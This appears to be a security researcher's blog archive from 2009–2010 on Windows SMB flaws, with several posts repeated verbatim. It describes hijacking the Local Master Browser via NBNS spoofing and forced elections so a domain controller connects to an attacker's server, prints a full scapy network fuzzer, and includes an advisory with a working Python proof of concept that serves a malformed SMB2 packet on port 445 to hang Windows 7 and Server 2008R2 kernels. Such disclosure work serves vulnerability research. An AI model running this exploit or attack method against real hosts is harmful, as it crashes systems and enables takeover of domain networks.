This SMBv1 vulnerability has been disclosed to MS back in february 2010 and patched this month in MS10-054 bulletin.
This vulnerability is quite interesting since it's present in all Windows version since Windows 2000, and can be triggered easily in at least 2 different Trans2 opcode by setting a Max Data Count to 0;
- QUERY_FS_INFO Query FS Attribute Info
- QUERY_FS_INFO, Query FS Volume Info
You can find the full advisory here: http://seclists.org/fulldisclosure/2010/Aug/122
SRD blog entry: http://blogs.technet.com/b/srd/archive/2010/08/10/ms10-054-exploitability-details-for-the-smb-server-update.aspx
Wednesday, August 11, 2010
Wednesday, May 12, 2010
Fuzzing lib released
This is a fuzzing lib I've been working on for a while (it's not a complete one, but still pretty powerfull), you can adapt it very easily to your fuzzer by invoking ;
import lib
from lib import *
Then you call one specific function, or randfunc().
randfunc will basicaly choose randomly the function in the lib to fuzz with.
Here's a quick example using this lib;
http://pastebin.com/fNFAW3Fh -- > this is not a smb fuzzer, it's simply an example of using this lib....
And yes you need to include the lib, which is located here ;
http://pastebin.com/xgPXpGtw
Enjoy !
import lib
from lib import *
Then you call one specific function, or randfunc().
randfunc will basicaly choose randomly the function in the lib to fuzz with.
Here's a quick example using this lib;
http://pastebin.com/fNFAW3Fh -- > this is not a smb fuzzer, it's simply an example of using this lib....
And yes you need to include the lib, which is located here ;
http://pastebin.com/xgPXpGtw
Enjoy !
Saturday, April 17, 2010
MS10-020
This bug was discovered back in december 2009, and patched by microsoft in April 2010.
This issue is a basic stack overflow affecting only windows 7/2008R2 smb1 implementation.
It's actually a nice bug as the affected function is not protected by a canary, and allow us to redirect the flow anywhere we want to.
You can find the full advisory about this bug here : http://seclists.org/fulldisclosure/2010/Apr/201
Have phun !
PoC url : http://pastebin.com/h3jSyJTN
This issue is a basic stack overflow affecting only windows 7/2008R2 smb1 implementation.
It's actually a nice bug as the affected function is not protected by a canary, and allow us to redirect the flow anywhere we want to.
You can find the full advisory about this bug here : http://seclists.org/fulldisclosure/2010/Apr/201
Have phun !
PoC url : http://pastebin.com/h3jSyJTN
Thursday, April 15, 2010
Turning SMB client bug to server side
This blog post is about a technic to automate with no user interaction at all SMB client side bug exploitation targeting the Domain Master Browser (DMB) or PDC (only the PDC can be a DMB)which is basicaly the perfect target in a pentest. Targeting the DMB is perfect, simply because if you control that box, you'll control all computer joined to this box tree.
Since the SRD is once again downplaying SMB client side bug i think it's important to share this kind of tricks.
It's also important to mention that Browser and NBNS abusing is well known since a long time, as theses protocols wasn't developed with security in mind, this blog post is a simple real case example.
There's two way to automate SMB client side bug;
The basic goal of this attack is to hijack the Local Master Browser (LMB), and there's various way to do so;
Simple, the Backup browser will sync via SMB (NetServerEnum2) on the LMB every 15 mn.
We don't care that much about the Backup Browser, what we want it's the DMB, and guess what, he's also syncing on the LMB as soon you send him a Browser MasterAnnouncement :]
In this case, i will wait for a HostAnnouncement, a LocalMasterAnnouncement or an ElectionResquest, then I will send two LMB ResetBrowserState;
- one Reset_state clear_all
- one Reset_state stop_master
Which will directly kill the LMB (at least on Windows implementation).
Then you can launch an election that you're sure to win (as mentionned before),
make a Local Master Browser Announcement, and finally a MasterAnnouncement, then the DMB will connect direclty to your fake server and get pwned (or not).
Here's a quickly made proof of concept which work pretty well , it also have a NBNS spoofer just in case an admin try to access a share:]
I included a proof of concept for a previously discovered bug patched in february (MS10-006), you can find the full advisory here: http://seclists.org/fulldisclosure/2010/Feb/168
Note: Make sure your SMB server/exploit listen on 139 and 445, and can handle NBSS session request, if not, you wont get any candy.
Since Blogger is not python friendly: http://pastebin.com/YBtzs9yr
A bug like MS10-006 can be easily wormable if exploited with this kind of approach.
Since the SRD is once again downplaying SMB client side bug i think it's important to share this kind of tricks.
It's also important to mention that Browser and NBNS abusing is well known since a long time, as theses protocols wasn't developed with security in mind, this blog post is a simple real case example.
There's two way to automate SMB client side bug;
- NBNS Spoofing (require some "kind" of user interaction in some way, anyways in a corporate network it works pretty well)
- Browser Protocol Abusing (the funny one)
The basic goal of this attack is to hijack the Local Master Browser (LMB), and there's various way to do so;
- Register via NBNS on the Workgroup or domain, and launch an election (zero filled election packet), the winning criteria is first the browser version, and then the box capabilities, which is controlled by us.
- Create a NBNS name/ip conflict with the LMB and after 3 shot send a "Name Overwrite Demand" packet
- Reset the LMB
Simple, the Backup browser will sync via SMB (NetServerEnum2) on the LMB every 15 mn.
We don't care that much about the Backup Browser, what we want it's the DMB, and guess what, he's also syncing on the LMB as soon you send him a Browser MasterAnnouncement :]
In this case, i will wait for a HostAnnouncement, a LocalMasterAnnouncement or an ElectionResquest, then I will send two LMB ResetBrowserState;
- one Reset_state clear_all
- one Reset_state stop_master
Which will directly kill the LMB (at least on Windows implementation).
Then you can launch an election that you're sure to win (as mentionned before),
make a Local Master Browser Announcement, and finally a MasterAnnouncement, then the DMB will connect direclty to your fake server and get pwned (or not).
Here's a quickly made proof of concept which work pretty well , it also have a NBNS spoofer just in case an admin try to access a share:]
I included a proof of concept for a previously discovered bug patched in february (MS10-006), you can find the full advisory here: http://seclists.org/fulldisclosure/2010/Feb/168
Note: Make sure your SMB server/exploit listen on 139 and 445, and can handle NBSS session request, if not, you wont get any candy.
Since Blogger is not python friendly: http://pastebin.com/YBtzs9yr
A bug like MS10-006 can be easily wormable if exploited with this kind of approach.
Tuesday, February 9, 2010
More details on MS10-006
An Advisory as been released by Microsoft patching MS10-006.
This vulnerability as been found back in november while testing some client side vulnerability on SMB.
A full advisory regarding the details of this issue is located here
Regarding the SRD statement for smb client possible exploitation i'd like to add & post a small tool abusing netbios name service functionnality.
Ronald Bowes did some great work with nbtool for such purpose.
You can find a small version in python here;
Basicly, anyone on the segment using :
net use \\blabla\share
net view \\blabla\share
dir \\blabla\share
etc
On vista/7/server2008|R2 it's also possible to use start -> search box --> \\existing_machine\share
Any of these command result in a NBNS query asking which IP is using this netbios name
Then this small utility will answer it's at "attacker_IP".
Once the ip resolved, the machine will initiate a smb connection to that IP.
You can also abuse the BROWSER service for same kind of purpose, I will post a full entry when i get some free time ...
This vulnerability as been found back in november while testing some client side vulnerability on SMB.
A full advisory regarding the details of this issue is located here
Regarding the SRD statement for smb client possible exploitation i'd like to add & post a small tool abusing netbios name service functionnality.
Ronald Bowes did some great work with nbtool for such purpose.
You can find a small version in python here;
Basicly, anyone on the segment using :
net use \\blabla\share
net view \\blabla\share
dir \\blabla\share
etc
On vista/7/server2008|R2 it's also possible to use start -> search box --> \\existing_machine\share
Any of these command result in a NBNS query asking which IP is using this netbios name
Then this small utility will answer it's at "attacker_IP".
Once the ip resolved, the machine will initiate a smb connection to that IP.
You can also abuse the BROWSER service for same kind of purpose, I will post a full entry when i get some free time ...
Sunday, November 22, 2009
Releasing ICMPv4/IP fuzzer prototype
This is a short message to release an IP/ICMPv4 fuzzer, destinated for UTesting, and else.
I'd like to thanks Philippe Biondi for making such a library as scapy
In this example we go deep as layer 3 fuzzing, thanks scapy, we fuzz IP and ICMP by disassembling the packet in bytes, and modifing it, and then joining it and sending back
You can simply capture a ping echo (for example) you sended and then fuzz it, you will need to replace the checksum bytes by 00 00 always, for more information :
http://www.networksorcery.com/enp/protocol/ip.htm
http://www.networksorcery.com/enp/protocol/icmp.htm
You can easily adapt this fuzzer to any kind of networking fuzzing.
Dont forget it's a prototype, and i ASSUME you know what you're doing, do not ask for help.
As blogger is not python friendly: http://pastebin.com/f5c536013
Have fun with this concept :)
#!/usr/bin/python
import random, sys,logging,os
from random import *
from scapy.all import *
logging.getLogger("scapy").setLevel(1)
##fuzzer core##
def onerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
print "fuzzing rand byte:%s\n" % (byte.encode("hex"))
return pack
def doublerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
byte2 = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing rand byte:%s byte2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack
def longrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def longerrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def longerrandnull(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte+"\x00"*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def opnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
print "fuzzing opnum:%s\n" % (byte.encode("hex"))
return pack
def doubleopnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
byte2 = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing opnum:%s et opnum no-2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack
def remove1(packet):
pack = packet[:]
i = randrange(0, len(pack)-1)
b = pack[:i] + pack[i+1:]
print "remove one char fuzz, removed :%s"%(pack[i].encode("hex"))
return b
def changenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
byte = str(chr(choice(range(256))))
pack[choice(null)] = byte
print "replaced one null by a %s"%(byte.encode("hex"))
return pack
def removenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
num = choice(null)
del pack[choice(null)]
print "deleted null no-:%s"%(num)
return pack
def randfunc(packet):
func = choice([onerand,doublerand,longrand,longerrand,longerrandnull,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (HARD)"%(func.__name__)
return func(packet)
def zenfunc(packet):
func = choice([onerand,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (ZEN)"%(func.__name__)
return func(packet)
##End fuzzer core##
ip = [chr(int(a, 16)) for a in """
4e fe 01 08 00 00 40 00 fa 01 00 00 c0 a8 02 64
c0 a8 02 65 44 24 0d 01 c0 a8 02 64 04 80 30 77
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00""".split()]
icmp = [chr(int(a, 16)) for a in """
08 00 00 00 00 00 00 04 75 54 08 4b 00 00 00 00
04 6b 0d 00 00 00 00 00 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
""".split()]
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
a= length[2:4]
pack = payload[:]
pack[2:4]= a
return pack
def OpIP(packet):
pack = packet[:]
num = str(chr(choice(range(1,9))))
num1 = str(chr(choice(range(0,150))))
#pack[0] = num
#pack[9] = num1
print "fuzzing version OPNUM no-:%s and nh OPNUM no-:%s"%(num.encode("hex"),num1.encode("hex"))
return pack
def OpIcmp(packet):
pack = packet[:]
num = str(chr(choice(range(0,42))))
pack[0] = num
print "fuzzing ICMP OPNUM no-:%s"%(num.encode("hex"))
return pack
##checksum calculation and replacement##
##checksum() ripped from scapy, hard to do better...
def checksum(pkt):
pkt=str(pkt)
s=0
if len(pkt) % 2 == 1:
pkt += "\0"
for i in range(len(pkt)/2):
s = s + (struct.unpack("!H",pkt[2*i:2*i+2])[0])
s = (s >> 16) + (s & 0xffff)
s += s >> 16
return ~s & 0xffff
##/checksum() ripped from scapy, hard to do better...
def add_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[2:4]=b
return pack
def add_ip_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[10:12]=b
return pack
##checksum calculation and replacement##
### snort is an example of hookin' a prog in your fuzzin'
pid = os.system("pidof snort")
while os.system("pidof snort") == pid:
a = longueur(zenfunc(ip)+add_checksum(randfunc(icmp)))
b = ''.join(add_ip_checksum(a))
packet = (Ether(dst="ff:ff:ff:ff:ff:ff",type=0x0800)/b)
print "packet IP:%s\n"%(b.encode("hex"))
sendp(packet)
##enjoy !
I'd like to thanks Philippe Biondi for making such a library as scapy
In this example we go deep as layer 3 fuzzing, thanks scapy, we fuzz IP and ICMP by disassembling the packet in bytes, and modifing it, and then joining it and sending back
You can simply capture a ping echo (for example) you sended and then fuzz it, you will need to replace the checksum bytes by 00 00 always, for more information :
http://www.networksorcery.com/enp/protocol/ip.htm
http://www.networksorcery.com/enp/protocol/icmp.htm
You can easily adapt this fuzzer to any kind of networking fuzzing.
Dont forget it's a prototype, and i ASSUME you know what you're doing, do not ask for help.
As blogger is not python friendly: http://pastebin.com/f5c536013
Have fun with this concept :)
#!/usr/bin/python
import random, sys,logging,os
from random import *
from scapy.all import *
logging.getLogger("scapy").setLevel(1)
##fuzzer core##
def onerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
print "fuzzing rand byte:%s\n" % (byte.encode("hex"))
return pack
def doublerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
byte2 = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing rand byte:%s byte2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack
def longrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def longerrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def longerrandnull(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte+"\x00"*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack
def opnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
print "fuzzing opnum:%s\n" % (byte.encode("hex"))
return pack
def doubleopnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
byte2 = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing opnum:%s et opnum no-2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack
def remove1(packet):
pack = packet[:]
i = randrange(0, len(pack)-1)
b = pack[:i] + pack[i+1:]
print "remove one char fuzz, removed :%s"%(pack[i].encode("hex"))
return b
def changenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
byte = str(chr(choice(range(256))))
pack[choice(null)] = byte
print "replaced one null by a %s"%(byte.encode("hex"))
return pack
def removenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
num = choice(null)
del pack[choice(null)]
print "deleted null no-:%s"%(num)
return pack
def randfunc(packet):
func = choice([onerand,doublerand,longrand,longerrand,longerrandnull,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (HARD)"%(func.__name__)
return func(packet)
def zenfunc(packet):
func = choice([onerand,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (ZEN)"%(func.__name__)
return func(packet)
##End fuzzer core##
ip = [chr(int(a, 16)) for a in """
4e fe 01 08 00 00 40 00 fa 01 00 00 c0 a8 02 64
c0 a8 02 65 44 24 0d 01 c0 a8 02 64 04 80 30 77
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00""".split()]
icmp = [chr(int(a, 16)) for a in """
08 00 00 00 00 00 00 04 75 54 08 4b 00 00 00 00
04 6b 0d 00 00 00 00 00 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
""".split()]
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
a= length[2:4]
pack = payload[:]
pack[2:4]= a
return pack
def OpIP(packet):
pack = packet[:]
num = str(chr(choice(range(1,9))))
num1 = str(chr(choice(range(0,150))))
#pack[0] = num
#pack[9] = num1
print "fuzzing version OPNUM no-:%s and nh OPNUM no-:%s"%(num.encode("hex"),num1.encode("hex"))
return pack
def OpIcmp(packet):
pack = packet[:]
num = str(chr(choice(range(0,42))))
pack[0] = num
print "fuzzing ICMP OPNUM no-:%s"%(num.encode("hex"))
return pack
##checksum calculation and replacement##
##checksum() ripped from scapy, hard to do better...
def checksum(pkt):
pkt=str(pkt)
s=0
if len(pkt) % 2 == 1:
pkt += "\0"
for i in range(len(pkt)/2):
s = s + (struct.unpack("!H",pkt[2*i:2*i+2])[0])
s = (s >> 16) + (s & 0xffff)
s += s >> 16
return ~s & 0xffff
##/checksum() ripped from scapy, hard to do better...
def add_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[2:4]=b
return pack
def add_ip_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[10:12]=b
return pack
##checksum calculation and replacement##
### snort is an example of hookin' a prog in your fuzzin'
pid = os.system("pidof snort")
while os.system("pidof snort") == pid:
a = longueur(zenfunc(ip)+add_checksum(randfunc(icmp)))
b = ''.join(add_ip_checksum(a))
packet = (Ether(dst="ff:ff:ff:ff:ff:ff",type=0x0800)/b)
print "packet IP:%s\n"%(b.encode("hex"))
sendp(packet)
##enjoy !
Wednesday, November 11, 2009
Windows 7 / Server 2008R2 Remote Kernel Crash
This bug is a real proof that SDL FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so basic, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)
If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?
"Most secure Os ever";
What ever your firewall is set to, you can get remotely smashed via IE or even via some broadcasting nbns tricks (no user interaction)
Advisory:
=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
-------------------------
..
III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2
on a LAN or via IE
VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2
VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.
VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: This bug released.
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so basic, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)
If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?
"Most secure Os ever";
What ever your firewall is set to, you can get remotely smashed via IE or even via some broadcasting nbns tricks (no user interaction)
Advisory:
=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
-------------------------
..
III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2
on a LAN or via IE
VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2
VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.
VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: This bug released.
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Subscribe to:
Posts (Atom)
Posts
